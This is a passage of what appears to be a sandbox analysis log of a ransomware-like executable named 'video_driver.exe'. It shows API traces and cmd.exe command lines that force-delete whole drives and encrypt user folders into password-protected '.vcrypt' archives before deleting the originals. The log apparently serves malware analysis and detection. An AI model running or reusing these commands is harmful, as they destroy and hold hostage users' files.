_String2="CMDCMDLINE") returned 8 [0072.467] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0072.467] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0072.467] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0072.467] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0072.467] GetProcessHeap () returned 0x610000 [0072.467] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x54) returned 0x6217c8 [0072.467] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af610 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0072.467] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2af610, lpFilePart=0x2af60c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2af60c*="Desktop") returned 0x25 [0072.467] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0072.467] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af38c | out: lpFindFileData=0x2af38c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x625760 [0072.468] FindClose (in: hFindFile=0x625760 | out: hFindFile=0x625760) returned 1 [0072.468] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2af38c | out: lpFindFileData=0x2af38c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8903220, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x8903220, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x625760 [0072.468] FindClose (in: hFindFile=0x625760 | out: hFindFile=0x625760) returned 1 [0072.468] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0072.468] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2af38c | out: lpFindFileData=0x2af38c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x780d560, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x780d560, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x625760 [0072.468] FindClose (in: hFindFile=0x625760 | out: hFindFile=0x625760) returned 1 [0072.468] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0072.468] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0072.469] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0072.469] GetProcessHeap () returned 0x610000 [0072.469] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624c70 | out: hHeap=0x610000) returned 1 [0072.469] GetEnvironmentStringsW () returned 0x624180* [0072.469] GetProcessHeap () returned 0x610000 [0072.469] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb36) returned 0x625fa0 [0072.469] FreeEnvironmentStringsW (penv=0x624180) returned 1 [0072.469] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0072.469] GetProcessHeap () returned 0x610000 [0072.469] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6217c8 | out: hHeap=0x610000) returned 1 [0072.469] GetProcessHeap () returned 0x610000 [0072.469] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400e) returned 0x626ae0 [0072.470] GetProcessHeap () returned 0x610000 [0072.470] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa0) returned 0x622e50 [0072.470] GetProcessHeap () returned 0x610000 [0072.470] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x626ae0 | out: hHeap=0x610000) returned 1 [0072.470] GetConsoleOutputCP () returned 0x1b5 [0072.470] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0072.470] GetUserDefaultLCID () returned 0x409 [0072.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0072.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af750, cchData=128 | out: lpLCData="0") returned 2 [0072.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af750, cchData=128 | out: lpLCData="0") returned 2 [0072.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af750, cchData=128 | out: lpLCData="1") returned 2 [0072.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0072.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0072.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0072.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0072.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0072.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0072.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0072.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0072.472] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0072.472] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0072.472] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0072.474] GetProcessHeap () returned 0x610000 [0072.474] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20c) returned 0x622ef8 [0072.474] GetConsoleTitleW (in: lpConsoleTitle=0x622ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0072.474] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0072.474] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0072.474] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0072.475] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0072.475] GetProcessHeap () returned 0x610000 [0072.475] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400a) returned 0x626ae0 [0072.475] GetProcessHeap () returned 0x610000 [0072.475] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4008) returned 0x62aaf8 [0072.476] GetProcessHeap () returned 0x610000 [0072.476] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1a) returned 0x6257e0 [0072.476] GetEnvironmentVariableW (in: lpName="p IN (\"W", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0072.476] _wcsicmp (_String1="p IN (\"W", _String2="CD") returned 13 [0072.476] _wcsicmp (_String1="p IN (\"W", _String2="ERRORLEVEL") returned 11 [0072.476] _wcsicmp (_String1="p IN (\"W", _String2="CMDEXTVERSION") returned 13 [0072.476] _wcsicmp (_String1="p IN (\"W", _String2="CMDCMDLINE") returned 13 [0072.476] _wcsicmp (_String1="p IN (\"W", _String2="DATE") returned 12 [0072.476] _wcsicmp (_String1="p IN (\"W", _String2="TIME") returned -4 [0072.476] _wcsicmp (_String1="p IN (\"W", _String2="RANDOM") returned -2 [0072.476] _wcsicmp (_String1="p IN (\"W", _String2="HIGHESTNUMANODENUMBER") returned 8 [0072.476] GetProcessHeap () returned 0x610000 [0072.476] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6257e0 | out: hHeap=0x610000) returned 1 [0072.476] GetProcessHeap () returned 0x610000 [0072.476] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62aaf8 | out: hHeap=0x610000) returned 1 [0072.477] GetProcessHeap () returned 0x610000 [0072.477] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4008) returned 0x62aaf8 [0072.477] GetProcessHeap () returned 0x610000 [0072.477] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62aaf8 | out: hHeap=0x610000) returned 1 [0072.477] GetProcessHeap () returned 0x610000 [0072.477] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x626ae0 | out: hHeap=0x610000) returned 1 [0072.477] _wcsicmp (_String1="if", _String2=")") returned 64 [0072.477] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0072.477] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0072.478] _wcsicmp (_String1="IF", _String2="if") returned 0 [0072.478] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0072.478] GetProcessHeap () returned 0x610000 [0072.478] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x623110 [0072.478] GetProcessHeap () returned 0x610000 [0072.478] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe) returned 0x61ffc0 [0072.478] GetProcessHeap () returned 0x610000 [0072.478] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x20) returned 0x6257e0 [0072.479] GetProcessHeap () returned 0x610000 [0072.479] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6257e0, Size=0x16) returned 0x621800 [0072.479] GetProcessHeap () returned 0x610000 [0072.479] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x621800) returned 0x16 [0072.479] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0072.480] GetProcessHeap () returned 0x610000 [0072.480] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x623170 [0072.480] GetProcessHeap () returned 0x610000 [0072.481] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x6231d0 [0072.481] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0072.481] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0072.481] GetProcessHeap () returned 0x610000 [0072.481] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12) returned 0x6231f0 [0072.481] GetProcessHeap () returned 0x610000 [0072.481] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1c) returned 0x6257e0 [0072.481] GetProcessHeap () returned 0x610000 [0072.482] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6257e0, Size=0x14) returned 0x623210 [0072.482] GetProcessHeap () returned 0x610000 [0072.482] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x623210) returned 0x14 [0072.482] _wcsicmp (_String1="del", _String2=")") returned 59 [0072.482] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0072.482] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0072.482] _wcsicmp (_String1="IF", _String2="del") returned 5 [0072.482] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0072.483] _wcsicmp (_String1="REM", _String2="del") returned 14 [0072.483] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0072.483] GetProcessHeap () returned 0x610000 [0072.483] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x623230 [0072.483] GetProcessHeap () returned 0x610000 [0072.483] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x61ffd8 [0072.483] GetProcessHeap () returned 0x610000 [0072.483] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x28) returned 0x623290 [0072.485] GetProcessHeap () returned 0x610000 [0072.485] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x6232c0 [0072.485] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0072.485] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0072.485] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0072.486] GetProcessHeap () returned 0x610000 [0072.486] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x623320 [0072.486] GetProcessHeap () returned 0x610000 [0072.486] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x44) returned 0x623380 [0072.486] GetProcessHeap () returned 0x610000 [0072.486] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x6233d0 [0072.487] GetProcessHeap () returned 0x610000 [0072.487] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6233d0, Size=0x12) returned 0x6233d0 [0072.487] GetProcessHeap () returned 0x610000 [0072.487] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x6233d0) returned 0x12 [0072.487] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0072.487] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0072.487] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0072.487] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0072.488] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0072.488] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0072.488] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0072.489] GetProcessHeap () returned 0x610000 [0072.489] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12) returned 0x6233f0 [0072.489] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0072.490] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0072.490] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0072.490] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0072.490] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0072.491] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0072.491] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0072.491] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0072.491] GetProcessHeap () returned 0x610000 [0072.491] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x623410 [0072.491] GetProcessHeap () returned 0x610000 [0072.491] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x623470 [0072.491] GetProcessHeap () returned 0x610000 [0072.491] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x20) returned 0x6257e0 [0072.494] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0072.496] GetFullPathNameW (in: lpFileName="W:", nBufferLength=0x208, lpBuffer=0x2af440, lpFilePart=0x2af1ec | out: lpBuffer="W:\\", lpFilePart=0x2af1ec*=0x0) returned 0x3 [0072.497] wcsncmp (_String1="W:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -5 [0072.502] GetFileAttributesW (lpFileName="W:\\" (normalized: "w:")) returned 0xffffffff [0072.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.502] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) Process: id = "69" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x406b3000" os_pid = "0x8e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"X:\" del /f /s /q \"X:\" & FOR /D %p IN (\"X:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 103 os_tid = 0xb90 Thread: id = 105 os_tid = 0x5e0 Process: id = "70" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3f1b8000" os_pid = "0xb00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"%USERPROFILE%\\Downloads\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Downloads\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_downloads.vcrypt\" \"%USERPROFILE%\\Downloads\\*\" & del /f /s /q \"%USERPROFILE%\\Downloads\\\" & FOR /D %p IN (\"%USERPROFILE%\\Downloads\\*\") do rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 104 os_tid = 0x618 Thread: id = 106 os_tid = 0xa14 Process: id = "71" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x405bd000" os_pid = "0xb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"%USERPROFILE%\\Pictures\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Pictures\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_pictures.vcrypt\" \"%USERPROFILE%\\Pictures\\*\" & del /f /s /q \"%USERPROFILE%\\Pictures\\\" & FOR /D %p IN (\"%USERPROFILE%\\Pictures\\*\") do rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 107 os_tid = 0xac4 Process: id = "72" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x40bc2000" os_pid = "0xb20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"Y:\" del /f /s /q \"Y:\" & FOR /D %p IN (\"Y:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 108 os_tid = 0xacc Process: id = "73" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x406c7000" os_pid = "0xbc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"%USERPROFILE%\\Music\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Music\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_music.vcrypt\" \"%USERPROFILE%\\Music\\*\" & del /f /s /q \"%USERPROFILE%\\Music\\\" & FOR /D %p IN (\"%USERPROFILE%\\Music\\*\") do rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 109 os_tid = 0xadc Process: id = "74" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x40dd0000" os_pid = "0xa68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"Z:\" del /f /s /q \"Z:\" & FOR /D %p IN (\"Z:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 110 os_tid = 0xba4 Process: id = "75" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x40cd5000" os_pid = "0xb88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"%USERPROFILE%\\Videos\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Videos\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_videos.vcrypt\" \"%USERPROFILE%\\Videos\\*\" & del /f /s /q \"%USERPROFILE%\\Videos\\\" & FOR /D %p IN (\"%USERPROFILE%\\Videos\\*\") do rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 111 os_tid = 0x344 Process: id = "76" image_name = "iexplore.exe" filename = "c:\\program files (x86)\\internet explorer\\iexplore.exe" page_root = "0x3e055000" os_pid = "0xaa4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x518" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\" SCODEF:1304 CREDAT:14337" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 112 os_tid = 0xa9c Process: id = "77" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3edda000" os_pid = "0xaa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"A:\" del /f /s /q \"A:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 113 os_tid = 0x3a4 Process: id = "78" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3fbdf000" os_pid = "0x9d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"%USERPROFILE%\\Documents\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Documents\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_documents.vcrypt\" \"%USERPROFILE%\\Documents\\*\" & del /f /s /q \"%USERPROFILE%\\Documents\\\" & FOR /D %p IN (\"%USERPROFILE%\\Documents\\*\") do rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT 